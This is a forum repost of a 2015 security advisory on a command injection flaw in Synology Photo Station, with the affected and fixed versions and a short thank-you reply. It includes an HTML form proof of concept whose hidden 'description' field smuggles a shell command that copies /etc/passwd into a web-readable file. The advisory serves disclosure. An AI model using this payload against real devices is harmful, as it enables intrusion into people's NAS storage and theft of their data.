KhiZaRix Posted May 26, 2015 Report Share Posted May 26, 2015 ------------------------------------------------------------------------Command injection vulnerability in Synology Photo Station------------------------------------------------------------------------Han Sahin, May 2015------------------------------------------------------------------------Abstract------------------------------------------------------------------------A command injection vulnerability was found in Synology Photo Station,which allows an attacker to execute arbitrary commands with theprivileges of the webserver. An attacker can use this vulnerability tocompromise a Synology DiskStation NAS, including all data stored on theNAS.------------------------------------------------------------------------Tested version------------------------------------------------------------------------This issue was tested on Synology Photo Station version 6.2-2858.------------------------------------------------------------------------Fix------------------------------------------------------------------------Synology reports that this issue has been resolved in Photo Stationversion 6.3-2945.https://www.synology.com/en-us/releaseNote/PhotoStation------------------------------------------------------------------------Details------------------------------------------------------------------------https://www.securify.nl/advisory/SFY20150502/command_injection_vulnerability_in_synology_photo_station.htmlProof of conceptThe following proof of concept copies the /etc/passwd file to /var/services/photo/Securify.txt.<html><body><form action="http://<target>/photo/webapi/photo.php" method="POST"><input type="hidden" name="id" value="photo_536168696e_53637265656e2053686f7420323031352d30352d31302061742032322e33342e33352e706e67" /><input type="hidden" name="description" value="| cat /etc/passwd > /var/services/photo/Securify.txt " /><input type="hidden" name="api" value="SYNO.PhotoStation.Photo" /><input type="hidden" name="method" value="edit" /><input type="hidden" name="version" value="1" /><input type="hidden" name="ps_username" value="admin" /><input type="hidden" name="" value="" /><input type="submit" value="Submit request" /></form></body></html>Sursa: http://dl.packetstormsecurity.net/1505-exploits/synologyphotostation-exec.txt Quote Link to comment Share on other sites More sharing options...
snoopeu Posted May 27, 2015 Report Share Posted May 27, 2015 mersii Quote Link to comment Share on other sites More sharing options...